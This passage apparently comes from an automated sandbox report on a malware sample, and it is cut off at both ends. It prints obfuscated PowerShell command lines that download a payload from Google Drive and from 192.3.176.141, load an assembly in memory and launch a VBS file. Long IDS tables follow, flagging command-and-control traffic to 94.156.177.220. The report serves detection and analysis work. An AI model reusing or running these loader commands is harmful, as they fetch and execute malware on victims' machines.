f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4008, TargetFilename: C:\Users\user\AppData\Local\Temp\2whqha0s.5gp.ps1

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", ProcessId: 3328, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:22:37.665307+020020241971A Network Trojan was detected192.3.176.14180192.168.2.2249164TCP
                2024-10-24T21:22:43.229274+020020241971A Network Trojan was detected192.3.176.14180192.168.2.2249166TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:22:37.665253+020020244491Attempted User Privilege Gain192.168.2.2249164192.3.176.14180TCP
                2024-10-24T21:22:43.229261+020020244491Attempted User Privilege Gain192.168.2.2249166192.3.176.14180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:26.886644+020020243121A Network Trojan was detected192.168.2.224917194.156.177.22080TCP
                2024-10-24T21:23:29.808663+020020243121A Network Trojan was detected192.168.2.224917294.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:25.857786+020020253811Malware Command and Control Activity Detected192.168.2.224917194.156.177.22080TCP
                2024-10-24T21:23:27.167849+020020253811Malware Command and Control Activity Detected192.168.2.224917294.156.177.22080TCP
                2024-10-24T21:23:29.882996+020020253811Malware Command and Control Activity Detected192.168.2.224917394.156.177.22080TCP
                2024-10-24T21:23:31.085554+020020253811Malware Command and Control Activity Detected192.168.2.224917494.156.177.22080TCP
                2024-10-24T21:23:32.718723+020020253811Malware Command and Control Activity Detected192.168.2.224917594.156.177.22080TCP
                2024-10-24T21:23:34.319094+020020253811Malware Command and Control Activity Detected192.168.2.224917694.156.177.22080TCP
                2024-10-24T21:23:36.550346+020020253811Malware Command and Control Activity Detected192.168.2.224917794.156.177.22080TCP
                2024-10-24T21:23:37.888749+020020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-24T21:23:39.094384+020020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-24T21:23:40.351612+020020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-24T21:23:41.637884+020020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-24T21:23:42.903713+020020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-24T21:23:44.172011+020020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-24T21:23:45.422327+020020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-24T21:23:46.883325+020020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-24T21:23:48.406792+020020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-24T21:23:49.566653+020020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-24T21:23:50.751878+020020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-24T21:23:51.961137+020020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-24T21:23:53.505309+020020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-24T21:23:55.726103+020020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-24T21:23:56.972372+020020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-24T21:23:59.275066+020020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-24T21:24:00.662976+020020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-24T21:24:01.927481+020020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-24T21:24:03.260935+020020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-24T21:24:04.916021+020020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-24T21:24:07.357975+020020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-24T21:24:08.611452+020020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-24T21:24:10.055685+020020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-24T21:24:14.427514+020020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-24T21:24:15.731889+020020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-24T21:24:17.099666+020020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-24T21:24:18.288921+020020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-24T21:24:19.585023+020020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:30.937971+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249173TCP
                2024-10-24T21:23:32.525580+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249174TCP
                2024-10-24T21:23:34.305427+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249175TCP
                2024-10-24T21:23:36.400835+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249176TCP
                2024-10-24T21:23:37.750078+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249177TCP
                2024-10-24T21:23:38.958628+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249178TCP
                2024-10-24T21:23:40.192064+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249179TCP
                2024-10-24T21:23:41.455373+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249180TCP
                2024-10-24T21:23:42.724663+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249181TCP
                2024-10-24T21:23:43.964080+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249182TCP
                2024-10-24T21:23:45.255136+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249183TCP
                2024-10-24T21:23:46.858270+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249184TCP
                2024-10-24T21:23:47.977146+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249185TCP
                2024-10-24T21:23:49.415576+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249186TCP
                2024-10-24T21:23:50.575297+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249187TCP
                2024-10-24T21:23:51.783242+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249188TCP
                2024-10-24T21:23:53.037216+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249189TCP
                2024-10-24T21:23:55.559391+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249190TCP
                2024-10-24T21:23:56.814340+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249191TCP
                2024-10-24T21:23:59.107737+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249192TCP
                2024-10-24T21:24:00.329944+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249193TCP
                2024-10-24T21:24:01.793729+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249194TCP
                2024-10-24T21:24:03.093210+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249195TCP
                2024-10-24T21:24:04.456210+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249196TCP
                2024-10-24T21:24:07.135690+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249197TCP
                2024-10-24T21:24:08.472218+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249198TCP
                2024-10-24T21:24:09.786399+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249199TCP
                2024-10-24T21:24:14.278170+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249200TCP
                2024-10-24T21:24:15.563775+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249201TCP
                2024-10-24T21:24:16.936123+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249202TCP
                2024-10-24T21:24:18.138996+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249203TCP
                2024-10-24T21:24:19.438433+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249204TCP
                2024-10-24T21:24:20.599686+020020254831A Network Trojan was detected94.156.177.22080192.168.2.2249205TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:30.931919+020020243131Malware Command and Control Activity Detected192.168.2.224917394.156.177.22080TCP
                2024-10-24T21:23:32.518744+020020243131Malware Command and Control Activity Detected192.168.2.224917494.156.177.22080TCP
                2024-10-24T21:23:33.892143+020020243131Malware Command and Control Activity Detected192.168.2.224917594.156.177.22080TCP
                2024-10-24T21:23:36.394614+020020243131Malware Command and Control Activity Detected192.168.2.224917694.156.177.22080TCP
                2024-10-24T21:23:37.743711+020020243131Malware Command and Control Activity Detected192.168.2.224917794.156.177.22080TCP
                2024-10-24T21:23:38.952622+020020243131Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-24T21:23:40.186012+020020243131Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-24T21:23:41.449167+020020243131Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-24T21:23:42.717883+020020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-24T21:23:43.958201+020020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-24T21:23:45.248595+020020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-24T21:23:46.621499+020020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-24T21:23:47.970542+020020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-24T21:23:49.409576+020020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-24T21:23:50.569418+020020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-24T21:23:51.776491+020020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-24T21:23:53.031405+020020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-24T21:23:55.553592+020020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-24T21:23:56.808265+020020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-24T21:23:59.107069+020020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-24T21:24:00.323075+020020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-24T21:24:01.787705+020020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-24T21:24:03.086401+020020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-24T21:24:04.455922+020020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-24T21:24:07.129727+020020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-24T21:24:08.466124+020020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-24T21:24:09.780520+020020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-24T21:24:14.272410+020020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-24T21:24:15.557829+020020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-24T21:24:16.929590+020020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-24T21:24:18.132065+020020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-24T21:24:19.432343+020020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-24T21:24:20.593841+020020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:30.931919+020020243181Malware Command and Control Activity Detected192.168.2.224917394.156.177.22080TCP
                2024-10-24T21:23:32.518744+020020243181Malware Command and Control Activity Detected192.168.2.224917494.156.177.22080TCP
                2024-10-24T21:23:33.892143+020020243181Malware Command and Control Activity Detected192.168.2.224917594.156.177.22080TCP
                2024-10-24T21:23:36.394614+020020243181Malware Command and Control Activity Detected192.168.2.224917694.156.177.22080TCP
                2024-10-24T21:23:37.743711+020020243181Malware Command and Control Activity Detected192.168.2.224917794.156.177.22080TCP
                2024-10-24T21:23:38.952622+020020243181Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-24T21:23:40.186012+020020243181Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-24T21:23:41.449167+020020243181Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-24T21:23:42.717883+020020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-24T21:23:43.958201+020020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-24T21:23:45.248595+020020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-24T21:23:46.621499+020020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-24T21:23:47.970542+020020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-24T21:23:49.409576+020020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-24T21:23:50.569418+020020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-24T21:23:51.776491+020020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-24T21:23:53.031405+020020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-24T21:23:55.553592+020020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-24T21:23:56.808265+020020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-24T21:23:59.107069+020020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-24T21:24:00.323075+020020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-24T21:24:01.787705+020020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-24T21:24:03.086401+020020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-24T21:24:04.455922+020020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-24T21:24:07.129727+020020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-24T21:24:08.466124+020020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-24T21:24:09.780520+020020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-24T21:24:14.272410+020020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-24T21:24:15.557829+020020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-24T21:24:16.929590+020020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-24T21:24:18.132065+020020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-24T21:24:19.432343+020020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-24T21:24:20.593841+020020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:25.857786+020020216411A Network Trojan was detected192.168.2.224917194.156.177.22080TCP
                2024-10-24T21:23:27.167849+020020216411A Network Trojan was detected192.168.2.224917294.156.177.22080TCP
                2024-10-24T21:23:29.882996+020020216411A Network Trojan was detected192.168.2.224917394.156.177.22080TCP
                2024-10-24T21:23:31.085554+020020216411A Network Trojan was detected192.168.2.224917494.156.177.22080TCP
                2024-10-24T21:23:32.718723+020020216411A Network Trojan was detected192.168.2.224917594.156.177.22080TCP
                2024-10-24T21:23:34.319094+020020216411A Network Trojan was detected192.168.2.224917694.156.177.22080TCP
                2024-10-24T21:23:36.550346+020020216411A Network Trojan was detected192.168.2.224917794.156.177.22080TCP
                2024-10-24T21:23:37.888749+020020216411A Network Trojan was detected192.168.2.224917894.156.177.22080TCP
                2024-10-24T21:23:39.094384+020020216411A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
                2024-10-24T21:23:40.351612+020020216411A Network Trojan was detected192.168.2.224918094.156.177.22080TCP
                2024-10-24T21:23:41.637884+020020216411A Network Trojan was detected192.168.2.224918194.156.177.22080TCP
                2024-10-24T21:23:42.903713+020020216411A Network Trojan was detected192.168.2.224918294.156.177.22080TCP
                2024-10-24T21:23:44.172011+020020216411A Network Trojan was detected192.168.2.224918394.156.177.22080TCP
                2024-10-24T21:23:45.422327+020020216411A Network Trojan was detected192.168.2.224918494.156.177.22080TCP
                2024-10-24T21:23:46.883325+020020216411A Network Trojan was detected192.168.2.224918594.156.177.22080TCP
                2024-10-24T21:23:48.406792+020020216411A Network Trojan was detected192.168.2.224918694.156.177.22080TCP
                2024-10-24T21:23:49.566653+020020216411A Network Trojan was detected192.168.2.224918794.156.177.22080TCP
                2024-10-24T21:23:50.751878+020020216411A Network Trojan was detected192.168.2.224918894.156.177.22080TCP
                2024-10-24T21:23:51.961137+020020216411A Network Trojan was detected192.168.2.224918994.156.177.22080TCP
                2024-10-24T21:23:53.505309+020020216411A Network Trojan was detected192.168.2.224919094.156.177.22080TCP
                2024-10-24T21:23:55.726103+020020216411A Network Trojan was detected192.168.2.224919194.156.177.22080TCP
                2024-10-24T21:23:56.972372+020020216411A Network Trojan was detected192.168.2.224919294.156.177.22080TCP
                2024-10-24T21:23:59.275066+020020216411A Network Trojan was detected192.168.2.224919394.156.177.22080TCP
                2024-10-24T21:24:00.662976+020020216411A Network Trojan was detected192.168.2.224919494.156.177.22080TCP
                2024-10-24T21:24:01.927481+020020216411A Network Trojan was detected192.168.2.224919594.156.177.22080TCP
                2024-10-24T21:24:03.260935+020020216411A Network Trojan was detected192.168.2.224919694.156.177.22080TCP
                2024-10-24T21:24:04.916021+020020216411A Network Trojan was detected192.168.2.224919794.156.177.22080TCP
                2024-10-24T21:24:07.357975+020020216411A Network Trojan was detected192.168.2.224919894.156.177.22080TCP
                2024-10-24T21:24:08.611452+020020216411A Network Trojan was detected192.168.2.224919994.156.177.22080TCP
                2024-10-24T21:24:10.055685+020020216411A Network Trojan was detected192.168.2.224920094.156.177.22080TCP
                2024-10-24T21:24:14.427514+020020216411A Network Trojan was detected192.168.2.224920194.156.177.22080TCP
                2024-10-24T21:24:15.731889+020020216411A Network Trojan was detected192.168.2.224920294.156.177.22080TCP
                2024-10-24T21:24:17.099666+020020216411A Network Trojan was detected192.168.2.224920394.156.177.22080TCP
                2024-10-24T21:24:18.288921+020020216411A Network Trojan was detected192.168.2.224920494.156.177.22080TCP
                2024-10-24T21:24:19.585023+020020216411A Network Trojan was detected192.168.2.224920594.156.177.22080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:11.639661+020020490381A Network Trojan was detected172.217.16.193443192.168.2.2249169TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T21:23:25.857786+020028257661Malware Command and Control Activity Detected192.168.2.224917194.156.177.22080TCP
                2024-10-24T21:23:27.167849+020028257661Malware Command and Control Activity Detected192.168.2.224917294.156.177.22080TCP
                2024-10-24T21:23:29.882996+020028257661Malware Command and Control Activity Detected192.168.2.224917394.156.177.22080TCP
                2024-10-24T21:23:31.085554+020028257661Malware Command and Control Activity Detected192.168.2.224917494.156.177.22080TCP
                2024-10-24T21:23:32.718723+020028257661Malware Command and Control Activity Detected192.168.2.224917594.156.177.22080TCP
                2024-10-24T21:23:34.319094+020028257661Malware Command and Control Activity Detected192.168.2.224917694.156.177.22080TCP
                2024-10-24T21:23:36.550346+020028257661Malware Command and Control Activity Detected192.168.2.224917794.156.177.22080TCP
                2024-10-24T21:23:37.888749+020028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
                2024-10-24T21:23:39.094384+020028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
                2024-10-24T21:23:40.351612+020028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
                2024-10-24T21:23:41.637884+020028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
                2024-10-24T21:23:42.903713+020028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
                2024-10-24T21:23:44.172011+020028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
                2024-10-24T21:23:45.422327+020028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
                2024-10-24T21:23:46.883325+020028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
                2024-10-24T21:23:48.406792+020028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
                2024-10-24T21:23:49.566653+020028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
                2024-10-24T21:23:50.751878+020028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
                2024-10-24T21:23:51.961137+020028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
                2024-10-24T21:23:53.505309+020028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
                2024-10-24T21:23:55.726103+020028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
                2024-10-24T21:23:56.972372+020028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
                2024-10-24T21:23:59.275066+020028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
                2024-10-24T21:24:00.662976+020028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
                2024-10-24T21:24:01.927481+020028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
                2024-10-24T21:24:03.260935+020028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
                2024-10-24T21:24:04.916021+020028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
                2024-10-24T21:24:07.357975+020028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
                2024-10-24T21:24:08.611452+020028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
                2024-10-24T21:24:10.055685+020028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
                2024-10-24T21:24:14.427514+020028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
                2024-10-24T21:24:15.731889+020028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
                2024-10-24T21:24:17.099666+020028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
                2024-10-24T21:24:18.288921+020028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
                2024-10-24T21:24:19.585023+020028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
